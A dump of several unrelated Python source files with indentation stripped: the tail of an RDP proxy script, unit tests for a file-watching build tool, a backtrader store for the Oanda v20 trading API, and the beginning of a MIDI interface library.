[consts.REV_SCANCODE["Enter"], UP, 0],
]
return result
def run():
try:
while True:
lsock, rsock = open_sockets(args.target_port)
RDPProxy(lsock, rsock).start()
except KeyboardInterrupt:
pass
|
tests.py
|
import unittest
import time
import random
import threading
from subprocess import CalledProcessError
from os.path import abspath, join, dirname, exists
from os import mkdir
import shutil
from maryjane import Project, Observer, MaryjaneSyntaxError
WAIT = 1
class ProjectTestCase(unittest.TestCase):
def setUp(self):
self.this_dir = abspath(dirname(__file__))
self.stuff_dir = join(self.this_dir, 'test_stuff')
self.static_dir = join(self.stuff_dir, 'static')
self.contrib_dir = join(self.stuff_dir, 'contrib')
self.temp_dir = join(self.stuff_dir, '../temp')
if exists(self.temp_dir):
shutil.rmtree(self.temp_dir)
mkdir(self.temp_dir)
self.file1 = join(self.static_dir, 'file1.txt')
self.misc_file1 = join(self.static_dir, 'misc', 'file1.txt')
self.nowatch_file1 = join(self.static_dir, 'misc', 'no-watch-file.txt')
self.unused_file = join(self.contrib_dir, 'unused-file.txt')
self.dummy_file = join(self.contrib_dir, 'dummy-file.txt')
self.outfile = join(self.temp_dir, 'out.txt')
# Reset files
with open(self.file1, 'w') as f:
f.write('file1\n')
with open(self.misc_file1, 'w') as f:
f.write('misc file1\n')
with open(self.nowatch_file1, 'w') as f:
f.write('excluded file\n')
with open(self.dummy_file, 'w') as f:
f.write('Some dummy data\n')
with open(self.outfile, 'w') as f:
f.write('Some dummy texts\n')
def test_parser(self):
project = Project(join(self.stuff_dir, 'maryjane.yml'), watcher_type=None)
root = project.root
self.assertIsNotNone(root)
self.assertEqual(root['title'], '''
A simple multi-line
text.A simple multi-line
text. ''')
self.assertEqual(root['version'], '0.1.0')
self.assertIsNone(root['empty'])
self.assertEqual(root['static'], join(self.stuff_dir, 'static'))
self.assertDictEqual(
root['bag'],
{
'avg': .34,
'count': 11,
'item1': {
'item2': 'value2'
}
}
)
self.assertEqual(root['text_files']['file1'], join(self.stuff_dir, 'static', 'file1.txt'))
self.assertEqual(root['text_files']['files'], [
join(self.stuff_dir, 'static', 'file2.txt'),
join(self.stuff_dir, 'static', 'file3.txt'),
join(self.stuff_dir, 'contrib', 'file1.txt'),
join(self.stuff_dir, 'static', 'misc', 'no-watch-file.txt'),
join(self.stuff_dir, 'static', 'misc', 'file1.txt'),
])
self.assertRaises(AttributeError, lambda: root.non_exists)
project.reload()
root = project.root
self.assertEqual(root['text_files']['file1'], join(self.stuff_dir, 'static', 'file1.txt'))
self.assertRegex(root['text_files']['ls_result'].replace('\n', ''), '(generator\.py|index\.css|out\.txt)')
def test_watch(self):
project = Project(join(self.stuff_dir, 'maryjane.yml'), watcher_type=Observer, watch_delay=.000001, debug=True)
t = threading.Thread(daemon=True, target=project.wait_for_changes)
t.start()
time.sleep(WAIT)
# Simple watch
with open(self.file1, 'w') as f:
f.write('file1 edited.\n')
time.sleep(WAIT)
with open(self.outfile) as f:
self.assertEqual(f.readline().strip(), 'file1 edited.')
with open(self.file1, 'w') as f:
f.write('file1\n')
time.sleep(WAIT)
with open(self.outfile) as f:
self.assertEqual(f.readline().strip(), 'file1')
# Recursive watch test
with open(self.misc_file1, 'w') as f:
f.write('misc file1 edited.\n')
time.sleep(WAIT)
with open(self.outfile) as f:
self.assertEqual(next(reversed(f.readlines())).strip(), 'misc file1 edited.')
with open(self.misc_file1, 'w') as f:
f.write('misc file1\n')
time.sleep(WAIT)
with open(self.outfile) as f:
self.assertEqual(next(reversed(f.readlines())).strip(), 'misc file1')
# Exclude
with open(self.nowatch_file1, 'w') as f:
f.write('excluded edited file.\n')
time.sleep(WAIT)
with open(self.outfile) as f:
self.assertNotIn('excluded edited file.', f.read())
with open(self.nowatch_file1, 'w') as f:
f.write('excluded file\n')
# Single file watch
with open(self.unused_file, 'w') as f:
f.write('Some dummy texts: %s.\n' % random.random())
time.sleep(WAIT)
# Watch in root of maryjane.yml
with open(self.dummy_file, 'w') as f:
f.write('Some dummy data: %s.\n' % random.random())
time.sleep(WAIT)
def test_exceptions(self):
self.assertRaises(MaryjaneSyntaxError, Project, join(self.stuff_dir, 'bad-file.yml'))
self.assertRaises(MaryjaneSyntaxError, Project, join(self.stuff_dir, 'invalid-directive.yml'))
self.assertRaises(CalledProcessError, Project, join(self.stuff_dir, 'subprocess-error.yml'))
if __name__ == '__main__': # pragma: no cover
unittest.main()
|
oandav20store.py
|
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import collections
import threading
import copy
import json
import time as _time
from datetime import datetime, timezone
import v20
import backtrader as bt
from backtrader.metabase import MetaParams
from backtrader.utils.py3 import queue, with_metaclass
class SerializableEvent(object):
'''A threading.Event that can be serialized.'''
def __init__(self):
self.evt = threading.Event()
def set(self):
return self.evt.set()
def clear(self):
return self.evt.clear()
def isSet(self):
return self.evt.isSet()
def wait(self, timeout=0):
return self.evt.wait(timeout)
def __getstate__(self):
d = copy.copy(self.__dict__)
if self.evt.isSet():
d['evt'] = True
else:
d['evt'] = False
return d
def __setstate__(self, d):
self.evt = threading.Event()
if d['evt']:
self.evt.set()
class MetaSingleton(MetaParams):
'''Metaclass to make a metaclassed class a singleton'''
def __init__(cls, name, bases, dct):
super(MetaSingleton, cls).__init__(name, bases, dct)
cls._singleton = None
def __call__(cls, *args, **kwargs):
if cls._singleton is None:
cls._singleton = (
super(MetaSingleton, cls).__call__(*args, **kwargs))
return cls._singleton
class OandaV20Store(with_metaclass(MetaSingleton, object)):
'''Singleton class wrapping to control the connections to Oanda v20.
Params:
- ``token`` (default:``None``): API access token
- ``account`` (default: ``None``): account id
- ``practice`` (default: ``False``): use the test environment
- ``account_poll_freq`` (default: ``5.0``): refresh frequency for
account value/cash refresh
- ``stream_timeout`` (default: ``2``): timeout for stream requests
- ``poll_timeout`` (default: ``2``): timeout for poll requests
- ``reconnections`` (default: ``-1``): try to reconnect forever
connection errors
- ``reconntimeout`` (default: ``5.0``): how long to wait to reconnect
stream (feeds have own reconnection settings)
- ``notif_transactions`` (default: ``False``): notify store of all recieved
transactions
'''
params = dict(
token='',
account='',
practice=False,
# account balance refresh timeout
account_poll_freq=5.0,
# stream timeout
stream_timeout=2,
# poll timeout
poll_timeout=2,
# count of reconnections, -1 unlimited, 0 none
reconnections=-1,
# timeout between reconnections
reconntimeout=5.0,
# send store notification with recieved transactions
notif_transactions=False,
)
BrokerCls = None # broker class will auto register
DataCls = None # data class will auto register
# Oanda supported granularities
'''S5, S10, S15, S30, M1, M2, M3, M4, M5, M10, M15, M30, H1,
H2, H3, H4, H6, H8, H12, D, W, M'''
_GRANULARITIES = {
(bt.TimeFrame.Seconds, 5): 'S5',
(bt.TimeFrame.Seconds, 10): 'S10',
(bt.TimeFrame.Seconds, 15): 'S15',
(bt.TimeFrame.Seconds, 30): 'S30',
(bt.TimeFrame.Minutes, 1): 'M1',
(bt.TimeFrame.Minutes, 2): 'M2',
(bt.TimeFrame.Minutes, 3): 'M3',
(bt.TimeFrame.Minutes, 4): 'M4',
(bt.TimeFrame.Minutes, 5): 'M5',
(bt.TimeFrame.Minutes, 10): 'M10',
(bt.TimeFrame.Minutes, 15): 'M15',
(bt.TimeFrame.Minutes, 30): 'M30',
(bt.TimeFrame.Minutes, 60): 'H1',
(bt.TimeFrame.Minutes, 120): 'H2',
(bt.TimeFrame.Minutes, 180): 'H3',
(bt.TimeFrame.Minutes, 240): 'H4',
(bt.TimeFrame.Minutes, 360): 'H6',
(bt.TimeFrame.Minutes, 480): 'H8',
(bt.TimeFrame.Minutes, 720): 'H12',
(bt.TimeFrame.Days, 1): 'D',
(bt.TimeFrame.Weeks, 1): 'W',
(bt.TimeFrame.Months, 1): 'M',
}
# Order type matching with oanda
_ORDEREXECS = {
bt.Order.Market: 'MARKET',
bt.Order.Limit: 'LIMIT',
bt.Order.Stop: 'STOP',
bt.Order.StopTrail: 'TRAILING_STOP_LOSS'
}
# transactions which will be emitted on creating/accepting a order
_X_CREATE_TRANS = ['MARKET_ORDER',
'LIMIT_ORDER',
'STOP_ORDER',
'TAKE_PROFIT_ORDER',
'STOP_LOSS_ORDER',
'MARKET_IF_TOUCHED_ORDER',
'TRAILING_STOP_LOSS_ORDER']
# transactions which filled orders
_X_FILL_TRANS = ['ORDER_FILL']
# transactions which cancelled orders
_X_CANCEL_TRANS = ['ORDER_CANCEL']
# transactions which were rejected
_X_REJECT_TRANS = ['MARKET_ORDER_REJECT',
'LIMIT_ORDER_REJECT',
'STOP_ORDER_REJECT',
'TAKE_PROFIT_ORDER_REJECT',
'STOP_LOSS_ORDER_REJECT',
'MARKET_IF_TOUCHED_ORDER_REJECT',
'TRAILING_STOP_LOSS_ORDER_REJECT']
# transactions which can be ignored
_X_IGNORE_TRANS = ['DAILY_FINANCING',
'CLIENT_CONFIGURE']
# Date format used
_DATE_FORMAT = '%Y-%m-%dT%H:%M:%S.%f000Z'
# Oanda api endpoints
_OAPI_URL = ['api-fxtrade.oanda.com',
'api-fxpractice.oanda.com']
_OAPI_STREAM_URL = ['stream-fxtrade.oanda.com',
'stream-fxpractice.oanda.com']
@classmethod
def getdata(cls, *args, **kwargs):
'''Returns ``DataCls`` with args, kwargs'''
return cls.DataCls(*args, **kwargs)
@classmethod
def getbroker(cls, *args, **kwargs):
'''Returns broker with *args, **kwargs from registered ``BrokerCls``'''
return cls.BrokerCls(*args, **kwargs)
def __init__(self):
'''Initialization'''
super(OandaV20Store, self).__init__()
self.notifs = collections.deque() # store notifications for cerebro
self._cash = 0.0 # margin available, currently available cash
self._value = 0.0 # account balance
self._currency = None # account currency
self._leverage = 1 # leverage
self._client_id_prefix = str(datetime.now().timestamp())
self.broker = None # broker instance
self.datas = list() # datas that have registered over start
self._env = None # reference to cerebro for general notifications
self._evt_acct = SerializableEvent()
self._orders = collections.OrderedDict() # map order.ref to order id
self._trades = collections.OrderedDict() # map order.ref to trade id
# init oanda v20 api context
self.oapi = v20.Context(
self._OAPI_URL[int(self.p.practice)],
poll_timeout=self.p.poll_timeout,
port=443,
ssl=True,
token=self.p.token,
datetime_format='UNIX',
)
# init oanda v20 api stream context
self.oapi_stream = v20.Context(
self._OAPI_STREAM_URL[int(self.p.practice)],
stream_timeout=self.p.stream_timeout,
port=443,
ssl=True,
token=self.p.token,
datetime_format='UNIX',
)
def start(self, data=None, broker=None):
# datas require some processing to kickstart data reception
if data is None and broker is None:
self.cash = None
return
if data is not None:
self._env = data._env
# For datas simulate a queue with None to kickstart co
self.datas.append(data)
if self.broker is not None:
self.broker.data_started(data)
elif broker is not None:
self.broker = broker
self.streaming_events()
self.broker_threads()
def stop(self):
# signal end of thread
if self.broker is not None:
self.q_ordercreate.put(None)
self.q_orderclose.put(None)
self.q_account.put(None)
def put_notification(self, msg, *args, **kwargs):
'''Adds a notification'''
self.notifs.append((msg, args, kwargs))
def get_notifications(self):
'''Return the pending "store" notifications'''
self.notifs.append(None) # put a mark / threads could still append
return [x for x in iter(self.notifs.popleft, None)]
def get_positions(self):
'''Returns the currently open positions'''
try:
response = self.oapi.position.list_open(self.p.account)
pos = response.get('positions', 200)
# convert positions to dict
for idx, val in enumerate(pos):
pos[idx] = val.dict()
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
try:
return pos
except NameError:
return None
def get_granularity(self, timeframe, compression):
'''Returns the granularity useable for oanda'''
return self._GRANULARITIES.get((timeframe, compression), None)
def get_instrument(self, dataname):
'''Returns details about the requested instrument'''
try:
response = self.oapi.account.instruments(
self.p.account,
instruments=dataname)
inst = response.get('instruments', 200)
# convert instruments to dict
for idx, val in enumerate(inst):
inst[idx] = val.dict()
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
try:
return inst[0]
except NameError:
return None
def get_instruments(self, dataname):
'''Returns details about available instruments'''
try:
response = self.oapi.account.instruments(
self.p.account,
instruments=dataname)
inst = response.get('instruments', 200)
# convert instruments to dict
for idx, val in enumerate(inst):
inst[idx] = val.dict()
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
try:
return inst
except NameError:
return None
def get_pricing(self, dataname):
'''Returns details about current price'''
try:
response = self.oapi.pricing.get(self.p.account,
instruments=dataname)
prices = response.get('prices', 200)
# convert prices to dict
for idx, val in enumerate(prices):
prices[idx] = val.dict()
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
try:
return prices[0]
except NameError:
return None
def get_pricings(self, dataname):
'''Returns details about current prices'''
try:
response = self.oapi.pricing.get(self.p.account,
instruments=dataname)
prices = response.get('prices', 200)
# convert prices to dict
for idx, val in enumerate(prices):
prices[idx] = val.dict()
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
try:
return prices
except NameError:
return None
def get_transactions_range(self, from_id, to_id, exclude_outer=False):
'''Returns all transactions between range'''
try:
response = self.oapi.transaction.range(
self.p.account,
fromID=from_id,
toID=to_id)
transactions = response.get('transactions', 200)
if exclude_outer:
del transactions[0], transactions[-1]
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
try:
return transactions
except NameError:
return None
def get_transactions_since(self, id):
'''Returns all transactions since id'''
try:
response = self.oapi.transaction.since(
self.p.account,
id=id)
transactions = response.get('transactions', 200)
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
try:
return transactions
except NameError:
return None
def get_cash(self):
'''Returns the available cash'''
return self._cash
def get_value(self):
'''Returns the account balance'''
return self._value
def get_currency(self):
'''Returns the currency of the account'''
return self._currency
def get_leverage(self):
'''Returns the leverage of the account'''
return self._leverage
def broker_threads(self):
'''Creates threads for broker functionality'''
self.q_account = queue.Queue()
self.q_account.put(True) # force an immediate update
t = threading.Thread(target=self._t_account)
t.daemon = True
t.start()
self.q_ordercreate = queue.Queue()
t = threading.Thread(target=self._t_order_create)
t.daemon = True
t.start()
self.q_orderclose = queue.Queue()
t = threading.Thread(target=self._t_order_cancel)
t.daemon = True
t.start()
# Wait once for the values to be set
self._evt_acct.wait(self.p.account_poll_freq)
def streaming_events(self):
'''Creates threads for event streaming'''
q = queue.Queue()
kwargs = {'q': q}
t = threading.Thread(target=self._t_streaming_events, kwargs=kwargs)
t.daemon = True
t.start()
return q
def streaming_prices(self, dataname):
'''Creates threads for price streaming'''
q = queue.Queue()
kwargs = {'q': q, 'dataname': dataname}
t = threading.Thread(target=self._t_streaming_prices, kwargs=kwargs)
t.daemon = True
t.start()
return q
def order_create(self, order, stopside=None, takeside=None, **kwargs):
'''Creates an order'''
okwargs = dict()
okwargs['instrument'] = order.data._dataname
okwargs['units'] = (
abs(int(order.created.size)) if order.isbuy()
else -abs(int(order.created.size))) # negative for selling
okwargs['type'] = self._ORDEREXECS[order.exectype]
okwargs['replace'] = order.info.get('replace', None)
okwargs['replace_type'] = order.info.get('replace_type', None)
if order.exectype != bt.Order.Market:
okwargs['price'] = format(
order.created.price,
'.%df' % order.data.contractdetails['displayPrecision'])
if order.valid is None:
okwargs['timeInForce'] = 'GTC' # good to cancel
else:
okwargs['timeInForce'] = 'GTD' # good to date
gtdtime = order.data.num2date(order.valid, tz=timezone.utc)
okwargs['gtdTime'] = gtdtime.strftime(self._DATE_FORMAT)
if order.exectype == bt.Order.StopTrail:
if 'replace' not in okwargs:
raise Exception('replace param needed for StopTrail order')
trailamount = order.trailamount
if order.trailpercent:
trailamount = order.price * order.trailpercent
okwargs['distance'] = format(
trailamount,
'.%df' % order.data.contractdetails['displayPrecision'])
if stopside is not None:
if stopside.exectype == bt.Order.StopTrail:
trailamount = stopside.trailamount
if stopside.trailpercent:
trailamount = order.price * stopside.trailpercent
okwargs['trailingStopLossOnFill'] = v20.transaction.TrailingStopLossDetails(
distance=format(
trailamount,
'.%df' % order.data.contractdetails['displayPrecision']),
clientExtensions=v20.transaction.ClientExtensions(
id=self._oref_to_client_id(stopside.ref),
comment=json.dumps(order.info)
).dict()
).dict()
else:
okwargs['stopLossOnFill'] = v20.transaction.StopLossDetails(
price=format(
stopside.price,
'.%df' % order.data.contractdetails['displayPrecision']),
clientExtensions=v20.transaction.ClientExtensions(
id=self._oref_to_client_id(stopside.ref),
comment=json.dumps(order.info)
).dict()
).dict()
if takeside is not None and takeside.price is not None:
okwargs['takeProfitOnFill'] = v20.transaction.TakeProfitDetails(
price=format(
takeside.price,
'.%df' % order.data.contractdetails['displayPrecision']),
clientExtensions=v20.transaction.ClientExtensions(
id=self._oref_to_client_id(takeside.ref),
comment=json.dumps(order.info)
).dict()
).dict()
# store backtrader order ref in client extensions
okwargs['clientExtensions'] = v20.transaction.ClientExtensions(
id=self._oref_to_client_id(order.ref),
comment=json.dumps(order.info)
).dict()
okwargs.update(**kwargs) # anything from the user
self.q_ordercreate.put((order.ref, okwargs,))
# notify orders of being submitted
self.broker._submit(order.ref)
if stopside is not None: # don't make price on stopside mandatory
self.broker._submit(stopside.ref)
if takeside is not None and takeside.price is not None:
self.broker._submit(takeside.ref)
return order
def order_cancel(self, order):
'''Cancels a order'''
self.q_orderclose.put(order.ref)
return order
def candles(self, dataname, dtbegin, dtend, timeframe, compression,
candleFormat, includeFirst=True, onlyComplete=True):
'''Returns historical rates'''
q = queue.Queue()
kwargs = {'dataname': dataname, 'dtbegin': dtbegin, 'dtend': dtend,
'timeframe': timeframe, 'compression': compression,
'candleFormat': candleFormat, 'includeFirst': includeFirst,
'onlyComplete': onlyComplete, 'q': q}
t = threading.Thread(target=self._t_candles, kwargs=kwargs)
t.daemon = True
t.start()
return q
def _oref_to_client_id(self, oref):
'''Converts a oref to client id'''
id = '{}-{}'.format(self._client_id_prefix, oref)
return id
def _client_id_to_oref(self, client_id):
'''Converts a client id to oref'''
oref = None
if str(client_id).startswith(self._client_id_prefix):
oref = int(str(client_id)[len(self._client_id_prefix)+1:])
return oref
def _t_account(self):
'''Callback method for account request'''
while True:
try:
msg = self.q_account.get(timeout=self.p.account_poll_freq)
if msg is None:
break # end of thread
except queue.Empty: # tmout -> time to refresh
pass
try:
response = self.oapi.account.summary(self.p.account)
accinfo = response.get('account', 200)
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
if self.p.reconnections == 0:
self.put_notification('Giving up fetching account summary')
return
continue
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
return
try:
self._cash = accinfo.marginAvailable
self._value = accinfo.balance
self._currency = accinfo.currency
self._leverage = 1/accinfo.marginRate
except KeyError:
pass
# notify of success, initialization waits for it
self._evt_acct.set()
def _t_streaming_events(self, q):
'''Callback method for streaming events'''
last_id = None
reconnections = 0
while True:
try:
response = self.oapi_stream.transaction.stream(
self.p.account
)
# process response
for msg_type, msg in response.parts():
if msg_type == 'transaction.TransactionHeartbeat':
if not last_id:
last_id = msg.lastTransactionID
# if a reconnection occurred
if reconnections > 0:
if last_id:
# get all transactions between the last seen and first from
# reconnected stream
old_transactions = self.get_transactions_since(
last_id)
for t in old_transactions:
if msg_type == 'transaction.Transaction':
if t.id > last_id:
self._transaction(t.dict())
last_id = t.id
reconnections = 0
if msg_type == 'transaction.Transaction':
if not last_id or msg.id > last_id:
self._transaction(msg.dict())
last_id = msg.id
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
if (self.p.reconnections == 0 or self.p.reconnections > 0
and reconnections > self.p.reconnections):
# unable to reconnect after x times
self.put_notification('Giving up reconnecting streaming events')
return
reconnections += 1
if self.p.reconntimeout is not None:
_time.sleep(self.p.reconntimeout)
self.put_notification('Trying to reconnect streaming events ({} of {})'.format(
reconnections,
self.p.reconnections))
continue
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
def _t_streaming_prices(self, dataname, q):
'''Callback method for streaming prices'''
try:
response = self.oapi_stream.pricing.stream(
self.p.account,
instruments=dataname,
)
# process response
for msg_type, msg in response.parts():
if msg_type == 'pricing.ClientPrice':
# put price into queue as dict
q.put(msg.dict())
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
# notify feed of error
q.put({'msg': 'CONNECTION_ISSUE'})
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
def _t_candles(self, dataname, dtbegin, dtend, timeframe, compression,
candleFormat, includeFirst, onlyComplete, q):
'''Callback method for candles request'''
granularity = self.get_granularity(timeframe, compression)
if granularity is None:
q.put(None)
return
dtkwargs = {}
if dtbegin is not None:
dtkwargs['fromTime'] = dtbegin.strftime(self._DATE_FORMAT)
dtkwargs['includeFirst'] = includeFirst
count = 0
reconnections = 0
while True:
if count > 1:
dtkwargs['includeFirst'] = False
try:
response = self.oapi.instrument.candles(
dataname,
granularity=granularity,
price=candleFormat,
**dtkwargs)
candles = response.get('candles', 200)
reconnections = 0
count += 1
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
if (self.p.reconnections == 0 or self.p.reconnections > 0
and reconnections > self.p.reconnections):
self.put_notification('Giving up fetching candles')
return
reconnections += 1
if self.p.reconntimeout is not None:
_time.sleep(self.p.reconntimeout)
self.put_notification(
'Trying to fetch candles ({} of {})'.format(
reconnections,
self.p.reconnections))
continue
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
continue
dtobj = None
for candle in candles:
# get current candle time
dtobj = datetime.utcfromtimestamp(float(candle.time))
# if end time is provided, check if time is reached for
# every candle
if dtend is not None and dtobj > dtend:
break
# add candle
if not onlyComplete or candle.complete:
q.put(candle.dict())
if dtobj is not None:
dtkwargs['fromTime'] = dtobj.strftime(self._DATE_FORMAT)
elif dtobj is None:
break
if dtend is not None and dtobj > dtend:
break
if len(candles) == 0:
break
q.put({}) # end of transmission'''
def _transaction(self, trans):
if self.p.notif_transactions:
self.put_notification(str(trans))
oid = None
ttype = trans['type']
if ttype in self._X_CREATE_TRANS:
# get order id (matches transaction id)
oid = trans['id']
oref = None
# identify backtrader order by checking client
# extensions (this is set when creating a order)
if 'clientExtensions' in trans:
# assume backtrader created the order for this transaction
oref = self._client_id_to_oref(trans['clientExtensions']['id'])
if oref is not None:
self._orders[oid] = oref
elif ttype in self._X_FILL_TRANS:
# order was filled, notify backtrader of it
oid = trans['orderID']
elif ttype in self._X_CANCEL_TRANS:
# order was cancelled, notify backtrader of it
oid = trans['orderID']
elif ttype in self._X_REJECT_TRANS:
# transaction was rejected, notify backtrader of it
oid = trans['requestID']
elif ttype in self._X_IGNORE_TRANS:
# transaction can be ignored
msg = 'Received transaction {} with id {}. Ignoring transaction.'
msg = msg.format(ttype, trans['id'])
self.put_notification(msg, trans)
else:
msg = 'Received transaction {} with id {}. Unknown situation.'
msg = msg.format(ttype, trans['id'])
self.put_notification(msg, trans)
return
if oid in self._orders:
# when an order id exists process transaction
self._process_transaction(oid, trans)
self._process_trades(self._orders[oid], trans)
else:
# external order created this transaction
if self.broker.p.use_positions and ttype in self._X_FILL_TRANS:
size = float(trans['units'])
price = float(trans['price'])
for data in self.datas:
if data._name == trans['instrument']:
self.broker._fill_external(data, size, price)
break
elif ttype not in self._X_IGNORE_TRANS:
# notify about unknown transaction
if self.broker.p.use_positions:
msg = 'Received external transaction {} with id {}. Skipping transaction.'
else:
msg = 'Received external transaction {} with id {}. Positions and trades may not match anymore.'
msg = msg.format(ttype, trans['id'])
self.put_notification(msg, trans)
def _process_transaction(self, oid, trans):
try:
# get a reference to a backtrader order based on
# the order id / trade id
oref = self._orders[oid]
except KeyError:
return
ttype = trans['type']
if ttype in self._X_CREATE_TRANS:
self.broker._accept(oref)
elif ttype in self._X_FILL_TRANS:
size = float(trans['units'])
price = float(trans['price'])
self.broker._fill(oref, size, price, reason=trans['reason'])
# store order ids which generated by the order
if 'tradeOpened' in trans:
self._orders[trans['tradeOpened']['tradeID']] = oref
if 'tradeReduced' in trans:
self._orders[trans['tradeReduced']['tradeID']] = oref
elif ttype in self._X_CANCEL_TRANS:
reason = trans['reason']
if reason == 'TIME_IN_FORCE_EXPIRED':
self.broker._expire(oref)
else:
self.broker._cancel(oref)
elif ttype in self._X_REJECT_TRANS:
self.broker._reject(oref)
def _process_trades(self, oref, trans):
if 'tradeID' in trans:
self._trades[oref] = trans['tradeID']
if 'tradeOpened' in trans:
self._trades[oref] = trans['tradeOpened']['tradeID']
if 'tradeClosed' in trans:
self._trades[oref] = trans['tradeClosed']['tradeID']
if 'tradesClosed' in trans:
for t in trans['tradesClosed']:
for key, value in self._trades.copy().items():
if value == t['tradeID']:
del self._trades[key]
def _t_order_create(self):
while True:
msg = self.q_ordercreate.get()
if msg is None:
break
oref, okwargs = msg
try:
if okwargs['replace']:
oid = '@{}'.format(
self._oref_to_client_id(okwargs['replace']))
if okwargs['replace'] in self._trades:
okwargs['tradeID'] = self._trades[okwargs['replace']]
if okwargs['replace_type']:
okwargs['type'] = okwargs['replace_type']
response = self.oapi.order.replace(
self.p.account,
oid,
order=okwargs)
else:
response = self.oapi.order.create(
self.p.account,
order=okwargs)
# get the transaction which created the order
o = response.get('orderCreateTransaction', 201)
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
self.broker._reject(oref)
continue
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
self.broker._reject(oref)
continue
def _t_order_cancel(self):
while True:
oref = self.q_orderclose.get()
if oref is None:
break
oid = None
for key, value in self._orders.items():
if value == oref:
oid = key
break
if oid is None:
continue # the order is no longer there
try:
# TODO either close pending orders or filled trades
response = self.oapi.order.cancel(self.p.account, oid)
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
continue
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
continue
self.broker._cancel(oref)
def _create_error_notif(self, e, response):
try:
notif = '{}: {} - {}'.format(
response.status,
response.reason,
response.get('errorMessage'))
except Exception:
notif = str(e)
return notif
|
midiate.py
|
# -*- coding: utf-8 -*-
##################################################################
## pymidiate ##
## Copyright (C) 2018-2019 PGkids Laboratory <lab@pgkids.co.jp> ##
##################################################################
import sys
import subprocess
import threading
import time
import pkg_resources
def get_default_bin_path():
path = pkg_resources.resource_filename(__name__, 'win32/intermidiator.exe')
if path.lower().find('a:\\dropbox\\home\\git\\pymidiate\\')==0:
# PGkids Laboratory Internal Environment
print('---------- DEVELOP ----------')
return 'a:/Dropbox/home/git/interMidiator/intermidiator.exe'
else:
# Public Environment
return path
def chr2hex(ascii):
if ascii <= 57: return (ascii-48)
else: return ascii-65 + 10
def int_from_hex3(c1,c2,c3):
return (chr2hex(c1)*16+chr2hex(c2))*16+chr2hex(c3)
def int_from_hex2(c1,c2):
return chr2hex(c1)*16+chr2hex(c2)
def take_handle_from_recv_msg(line):
return int_from_hex3(line[2],line[3],line[4])
def decode_callback_id(line, i):
result = 0
ascii = line[i]
while ascii>=48 and ascii<=57: # '0' to '9'
result = result*10 + (ascii-48)
i += 1
ascii = line[i]
return result
def decode_to_raw(b):
length = len(b)
if length <= 6:
r1 = int_from_hex2(b[0],b[1])
if length == 2: return (r1,)
else:
r2 = int_from_hex2(b[2],b[3])
if length == 4: return (r1, r2)
else: return (r1, r2, int_from_hex2(b[4],b[5]))
else:
# SysEx Message
i, tmp = 0, []
while i<length:
tmp.append(int_from_hex2(b[i],b[i+1]))
i += 2
return tuple(tmp)
class MidiDevice():
handle = None
class MidiInDevice(MidiDevice):
def __init__(self, handle_in):
self.handle = handle_in
class MidiOutDevice(MidiDevice):
def __init__(self, handle_out):
self.handle = handle_out
class Midiator():
def __init__(self, *, monitor_stderr=False, interMidiator=get_default_bin_path()):
self.interMidiator = interMidiator
self.__proc = None
self.__crlf = None
self.endmsg = None
self.__terminator = None
self.__thread_monitor_stdout = None
self.__thread_monitor_stderr = None
self.__thread_keepalive_sender = None
self.__sem_1 = None
self.__sem_2 = None
self.__sem_keepalive = None
self.__gResult = None
self.__gError = None
self.__callback_dic = None
self.__prev_dev = None
self.__prev_msg = None
self.__prev_raw_msg = None
self.__requires_monitor_stderr = monitor_stderr
def __trunc(self,str):
return str[0:(-2 if self.__crlf else -1)]
def __monitor_stdout(self):
while True:
line = self.__proc.stdout.readline()
if line==b'': return
cmd = line[0];
if cmd == ord('C'):
id = decode_callback_id(line,2)
#print('the id=',id)
function = self.__callback_dic[id]
if self.__prev_raw_msg is None: self.__prev_raw_msg = decode_to_raw(self.__prev_msg)
function(self.__prev_dev, self.__prev_msg, self.__prev_raw_msg)
elif cmd == ord('3'):
self.__prev_dev = take_handle_from_recv_msg(line)
self.__prev_msg = line[6:12]
self.__prev_raw_msg = None
elif cmd == ord('2'):
self.__prev_dev = take_handle_from_recv_msg(line)
self.__prev_msg = line[6:10]
self.__prev_raw_msg = None
elif cmd == ord('1'):
self.__prev_dev = take_handle_from_recv_msg(line)
self.__prev_msg = line[6:8]
self.__prev_raw_msg = None
elif cmd == ord('X'):
self.__prev_dev = take_handle_from_recv_msg(line)
self.__prev_msg = line[6:(-2 if self.__crlf else -1)]
self.__prev_raw_msg = None
elif cmd == ord('{'):
self.__gResult = []
while True:
line = self.__proc.stdout.readline()
if line != (b'}\r\n' if self.__crlf else b'}\n'):
self.__gResult.append(self.__trunc(line).decode())
else: break
self.__sem_1.release()
self.__sem_2.acquire()
elif cmd == ord('<'):
self.__gResult = self.__trunc(line[2:])
self.__sem_1.release()
self.__sem_2.acquire()
elif cmd == ord('!') or cmd == ord('F'):
self.__gResult = None
self.__gError = self.__trunc(line[2:])
#sem_1.release()
